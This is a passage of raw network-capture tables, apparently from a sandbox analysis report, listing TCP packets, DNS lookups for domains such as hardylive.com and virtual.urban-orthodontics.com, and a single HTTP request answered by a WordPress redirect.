                                                        Mar 11, 2025 19:03:24.269248962 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.269375086 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.269448996 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.269454956 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.280261040 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.280328989 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.280335903 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.280379057 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.284159899 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.284197092 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.284246922 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.286689043 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.286746025 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.286851883 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.286859035 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.290302992 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.290360928 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.290504932 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.296130896 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.296169043 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.296236038 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.296247005 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.296288013 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.301232100 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.301286936 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.301294088 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.307511091 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.307564020 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.307651997 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.313316107 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.313373089 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.313379049 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.313431978 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.313483953 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.316863060 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.316921949 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.316927910 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.317697048 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.317749977 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.317755938 CET44349843172.67.188.237192.168.2.4
                                                        Mar 11, 2025 19:03:24.366138935 CET49843443192.168.2.4172.67.188.237
                                                        Mar 11, 2025 19:03:24.782023907 CET44349848185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.782394886 CET49848443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:24.782426119 CET44349848185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.783565998 CET44349848185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.783952951 CET49848443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:24.784125090 CET44349848185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.784131050 CET49848443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:24.828356028 CET44349848185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.836666107 CET49848443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:24.908207893 CET44349846185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.908224106 CET44349846185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.908292055 CET49846443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:24.908318043 CET44349846185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.908329010 CET44349846185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.908385038 CET49846443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:24.909651041 CET49846443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:24.909665108 CET44349846185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.985784054 CET44349849185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.986079931 CET49849443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:24.986124039 CET44349849185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.987009048 CET44349849185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.987082005 CET49849443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:24.987493992 CET49849443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:24.987552881 CET44349849185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:24.987680912 CET49849443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:24.987695932 CET44349849185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:25.040806055 CET49849443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:25.326535940 CET44349850172.217.16.196192.168.2.4
                                                        Mar 11, 2025 19:03:25.354676962 CET49850443192.168.2.4172.217.16.196
                                                        Mar 11, 2025 19:03:25.354690075 CET44349850172.217.16.196192.168.2.4
                                                        Mar 11, 2025 19:03:25.358819008 CET44349850172.217.16.196192.168.2.4
                                                        Mar 11, 2025 19:03:25.358882904 CET49850443192.168.2.4172.217.16.196
                                                        Mar 11, 2025 19:03:25.359992981 CET49850443192.168.2.4172.217.16.196
                                                        Mar 11, 2025 19:03:25.360198021 CET44349850172.217.16.196192.168.2.4
                                                        Mar 11, 2025 19:03:25.405525923 CET49850443192.168.2.4172.217.16.196
                                                        Mar 11, 2025 19:03:25.405534983 CET44349850172.217.16.196192.168.2.4
                                                        Mar 11, 2025 19:03:25.446676016 CET49850443192.168.2.4172.217.16.196
                                                        Mar 11, 2025 19:03:26.943319082 CET44349847185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:26.944454908 CET44349847185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:26.944526911 CET49847443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:26.944818974 CET49847443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:26.944840908 CET44349847185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:27.173362017 CET49854443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:27.173408031 CET44349854185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:27.173487902 CET49854443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:27.173827887 CET49854443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:27.173846006 CET44349854185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:27.585376978 CET44349848185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:27.588668108 CET44349848185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:27.588725090 CET49848443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:27.594873905 CET49848443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:27.594887972 CET44349848185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:27.824148893 CET4434974746.173.214.32192.168.2.4
                                                        Mar 11, 2025 19:03:27.824227095 CET49747443192.168.2.446.173.214.32
                                                        Mar 11, 2025 19:03:27.874283075 CET49747443192.168.2.446.173.214.32
                                                        Mar 11, 2025 19:03:27.874351025 CET4434974746.173.214.32192.168.2.4
                                                        Mar 11, 2025 19:03:27.874783993 CET49855443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:27.874814034 CET44349855185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:27.874866962 CET49855443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:27.877629042 CET49855443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:27.877645969 CET44349855185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:28.006652117 CET44349849185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:28.056220055 CET49849443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:28.056261063 CET44349849185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:28.101746082 CET49849443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:28.186878920 CET44349849185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:28.186949968 CET44349849185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:28.187000990 CET49849443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:28.187082052 CET49849443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:28.187115908 CET44349849185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:28.203284979 CET49856443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:28.203313112 CET44349856185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:28.203363895 CET49856443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:28.203979969 CET49856443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:28.203994036 CET44349856185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:29.807847023 CET44349854185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:29.808227062 CET49854443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:29.808243036 CET44349854185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:29.809151888 CET44349854185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:29.809216022 CET49854443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:29.809577942 CET49854443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:29.809633017 CET44349854185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:29.809756994 CET49854443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:29.809763908 CET44349854185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:29.851803064 CET49854443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:30.417366982 CET44349855185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:30.448483944 CET49855443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:30.448502064 CET44349855185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:30.450356960 CET44349855185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:30.450452089 CET49855443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:30.451488972 CET49855443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:30.451586962 CET44349855185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:30.451663017 CET49855443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:30.492335081 CET44349855185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:30.493793011 CET49855443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:30.493813992 CET44349855185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:30.525943995 CET44349856185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:30.526221991 CET49856443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:30.526247025 CET44349856185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:30.527450085 CET44349856185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:30.527543068 CET49856443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:30.527875900 CET49856443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:30.527939081 CET44349856185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:30.528012991 CET49856443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:30.539201021 CET49855443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:30.570749998 CET49856443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:30.570764065 CET44349856185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:30.617361069 CET49856443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:32.400590897 CET8049733198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:03:32.400687933 CET4973380192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:03:32.494775057 CET4973380192.168.2.4198.12.251.68
                                                        Mar 11, 2025 19:03:32.499419928 CET8049733198.12.251.68192.168.2.4
                                                        Mar 11, 2025 19:03:33.168484926 CET44349854185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:33.169747114 CET44349855185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:33.169858932 CET44349855185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:33.169884920 CET44349854185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:33.169919968 CET49855443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:33.169950008 CET49854443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:33.170481920 CET49854443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:33.170500994 CET44349854185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:33.171391964 CET49855443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:33.171410084 CET44349855185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:33.591104031 CET44349856185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:33.632641077 CET49856443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:33.632658005 CET44349856185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:33.639262915 CET44349856185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:33.639319897 CET49856443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:33.639405012 CET49856443192.168.2.4185.76.79.50
                                                        Mar 11, 2025 19:03:33.639413118 CET44349856185.76.79.50192.168.2.4
                                                        Mar 11, 2025 19:03:34.870234013 CET44349850172.217.16.196192.168.2.4
                                                        Mar 11, 2025 19:03:34.870443106 CET44349850172.217.16.196192.168.2.4
                                                        Mar 11, 2025 19:03:34.870512009 CET49850443192.168.2.4172.217.16.196
                                                        Mar 11, 2025 19:03:36.495604992 CET49850443192.168.2.4172.217.16.196
                                                        Mar 11, 2025 19:03:36.495636940 CET44349850172.217.16.196192.168.2.4
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 11, 2025 19:02:18.143462896 CET53636491.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:18.163970947 CET53624631.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:22.477766991 CET6086053192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:22.477922916 CET6462453192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:22.484496117 CET53608601.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:22.484621048 CET53646241.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:23.427822113 CET5484953192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:23.428026915 CET6371653192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:23.441561937 CET53637161.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:23.448256969 CET53548491.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:23.450534105 CET5326853192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:23.450968981 CET5186653192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:23.462476015 CET53518661.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:23.465440035 CET53532681.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:23.707063913 CET53642801.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:23.846581936 CET53654831.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:31.727916002 CET5373753192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:31.728277922 CET5677753192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:31.736530066 CET53619561.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:31.877999067 CET53635061.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:32.136579037 CET53537371.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:32.138808012 CET53567771.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:40.829113960 CET53634601.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:46.122787952 CET53506441.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:46.954370022 CET5780053192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:46.954530001 CET5944353192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:46.974725008 CET53578001.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:46.975500107 CET53594431.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:50.604110003 CET6435253192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:50.604260921 CET6400153192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:50.617223978 CET53640011.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:50.627095938 CET53643521.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:51.356553078 CET53626971.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:54.296334028 CET5743453192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:54.296653986 CET6368253192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:54.297137976 CET5763953192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:54.297287941 CET6069853192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:02:54.306747913 CET53606981.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:54.316585064 CET53576391.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:54.412106037 CET53574341.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:54.526220083 CET53636821.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:02:59.579742908 CET53532071.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:06.475393057 CET6166253192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:03:06.475893974 CET5955653192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:03:06.759083033 CET53616621.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:06.759618044 CET53595561.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:10.574451923 CET5076053192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:03:10.574913025 CET5983553192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:03:10.596218109 CET53507601.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:10.627435923 CET53598351.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:12.523246050 CET53614451.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:17.749826908 CET6380153192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:03:17.749998093 CET6420353192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:03:17.753922939 CET53611921.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:17.764765978 CET53642031.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:17.767220974 CET53638011.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:18.674628973 CET6448053192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:03:18.674851894 CET5803453192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:03:18.896254063 CET53580341.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:18.902626991 CET53644801.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:22.666799068 CET53596681.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:24.122920036 CET138138192.168.2.4192.168.2.255
                                                        Mar 11, 2025 19:03:24.999414921 CET53637161.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:26.948934078 CET5059153192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:03:26.949083090 CET6153753192.168.2.41.1.1.1
                                                        Mar 11, 2025 19:03:27.060300112 CET53615371.1.1.1192.168.2.4
                                                        Mar 11, 2025 19:03:27.172797918 CET53505911.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPChecksumCodeType
                                                        Mar 11, 2025 19:02:54.526288033 CET192.168.2.41.1.1.1c233(Port unreachable)Destination Unreachable
                                                        Mar 11, 2025 19:03:10.627518892 CET192.168.2.41.1.1.1c285(Port unreachable)Destination Unreachable
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Mar 11, 2025 19:02:22.477766991 CET192.168.2.41.1.1.10x1332Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:22.477922916 CET192.168.2.41.1.1.10xbcbfStandard query (0)www.google.com65IN (0x0001)false
                                                        Mar 11, 2025 19:02:23.427822113 CET192.168.2.41.1.1.10x4219Standard query (0)hardylive.comA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:23.428026915 CET192.168.2.41.1.1.10x17a2Standard query (0)hardylive.com65IN (0x0001)false
                                                        Mar 11, 2025 19:02:23.450534105 CET192.168.2.41.1.1.10x8ebStandard query (0)hardylive.comA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:23.450968981 CET192.168.2.41.1.1.10xb268Standard query (0)hardylive.com65IN (0x0001)false
                                                        Mar 11, 2025 19:02:31.727916002 CET192.168.2.41.1.1.10x9993Standard query (0)apiexplorerzone.comA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:31.728277922 CET192.168.2.41.1.1.10xe56dStandard query (0)apiexplorerzone.com65IN (0x0001)false
                                                        Mar 11, 2025 19:02:46.954370022 CET192.168.2.41.1.1.10xbc39Standard query (0)g.adspeed.netA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:46.954530001 CET192.168.2.41.1.1.10xf48bStandard query (0)g.adspeed.net65IN (0x0001)false
                                                        Mar 11, 2025 19:02:50.604110003 CET192.168.2.41.1.1.10xcd47Standard query (0)hardylive.comA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:50.604260921 CET192.168.2.41.1.1.10xcde8Standard query (0)hardylive.com65IN (0x0001)false
                                                        Mar 11, 2025 19:02:54.296334028 CET192.168.2.41.1.1.10xc43aStandard query (0)virtual.urban-orthodontics.comA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:54.296653986 CET192.168.2.41.1.1.10x22b3Standard query (0)virtual.urban-orthodontics.com65IN (0x0001)false
                                                        Mar 11, 2025 19:02:54.297137976 CET192.168.2.41.1.1.10x6853Standard query (0)static.mailster.coA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:54.297287941 CET192.168.2.41.1.1.10x11a5Standard query (0)static.mailster.co65IN (0x0001)false
                                                        Mar 11, 2025 19:03:06.475393057 CET192.168.2.41.1.1.10xc7ccStandard query (0)g.adspeed.netA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:03:06.475893974 CET192.168.2.41.1.1.10x81e6Standard query (0)g.adspeed.net65IN (0x0001)false
                                                        Mar 11, 2025 19:03:10.574451923 CET192.168.2.41.1.1.10x4cb0Standard query (0)adserver.paywallproject.comA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:03:10.574913025 CET192.168.2.41.1.1.10x749cStandard query (0)adserver.paywallproject.com65IN (0x0001)false
                                                        Mar 11, 2025 19:03:17.749826908 CET192.168.2.41.1.1.10x78dbStandard query (0)adserver.paywallproject.comA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:03:17.749998093 CET192.168.2.41.1.1.10xd8ebStandard query (0)adserver.paywallproject.com65IN (0x0001)false
                                                        Mar 11, 2025 19:03:18.674628973 CET192.168.2.41.1.1.10xfba1Standard query (0)virtual.urban-orthodontics.comA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:03:18.674851894 CET192.168.2.41.1.1.10xc165Standard query (0)virtual.urban-orthodontics.com65IN (0x0001)false
                                                        Mar 11, 2025 19:03:26.948934078 CET192.168.2.41.1.1.10x105fStandard query (0)virtual.urban-orthodontics.comA (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:03:26.949083090 CET192.168.2.41.1.1.10xfe67Standard query (0)virtual.urban-orthodontics.com65IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Mar 11, 2025 19:02:22.484496117 CET1.1.1.1192.168.2.40x1332No error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:22.484621048 CET1.1.1.1192.168.2.40xbcbfNo error (0)www.google.com65IN (0x0001)false
                                                        Mar 11, 2025 19:02:23.448256969 CET1.1.1.1192.168.2.40x4219No error (0)hardylive.com198.12.251.68A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:23.465440035 CET1.1.1.1192.168.2.40x8ebNo error (0)hardylive.com198.12.251.68A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:32.136579037 CET1.1.1.1192.168.2.40x9993No error (0)apiexplorerzone.com46.173.214.32A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:46.974725008 CET1.1.1.1192.168.2.40xbc39No error (0)g.adspeed.net45.77.88.11A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:50.627095938 CET1.1.1.1192.168.2.40xcd47No error (0)hardylive.com198.12.251.68A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:54.306747913 CET1.1.1.1192.168.2.40x11a5No error (0)static.mailster.co65IN (0x0001)false
                                                        Mar 11, 2025 19:02:54.316585064 CET1.1.1.1192.168.2.40x6853No error (0)static.mailster.co188.114.97.3A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:54.316585064 CET1.1.1.1192.168.2.40x6853No error (0)static.mailster.co188.114.96.3A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:02:54.412106037 CET1.1.1.1192.168.2.40xc43aNo error (0)virtual.urban-orthodontics.com185.76.79.50A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:03:06.759083033 CET1.1.1.1192.168.2.40xc7ccNo error (0)g.adspeed.net45.77.88.11A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:03:10.596218109 CET1.1.1.1192.168.2.40x4cb0No error (0)adserver.paywallproject.com172.67.188.237A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:03:10.596218109 CET1.1.1.1192.168.2.40x4cb0No error (0)adserver.paywallproject.com104.21.57.34A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:03:10.627435923 CET1.1.1.1192.168.2.40x749cNo error (0)adserver.paywallproject.com65IN (0x0001)false
                                                        Mar 11, 2025 19:03:17.764765978 CET1.1.1.1192.168.2.40xd8ebNo error (0)adserver.paywallproject.com65IN (0x0001)false
                                                        Mar 11, 2025 19:03:17.767220974 CET1.1.1.1192.168.2.40x78dbNo error (0)adserver.paywallproject.com172.67.188.237A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:03:17.767220974 CET1.1.1.1192.168.2.40x78dbNo error (0)adserver.paywallproject.com104.21.57.34A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:03:18.902626991 CET1.1.1.1192.168.2.40xfba1No error (0)virtual.urban-orthodontics.com185.76.79.50A (IP address)IN (0x0001)false
                                                        Mar 11, 2025 19:03:27.172797918 CET1.1.1.1192.168.2.40x105fNo error (0)virtual.urban-orthodontics.com185.76.79.50A (IP address)IN (0x0001)false
                                                        • hardylive.com
                                                          • g.adspeed.net
                                                          • virtual.urban-orthodontics.com
                                                          • static.mailster.co
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449733198.12.251.68805708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        Mar 11, 2025 19:02:26.439101934 CET428OUTGET / HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Mar 11, 2025 19:02:27.398283005 CET229INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 0
                                                        Connection: keep-alive
                                                        X-Redirect-By: WordPress
                                                        Location: https://hardylive.com/
                                                        Mar 11, 2025 19:03:12.401520967 CET6OUTData Raw: 00
                                                        Data Ascii:


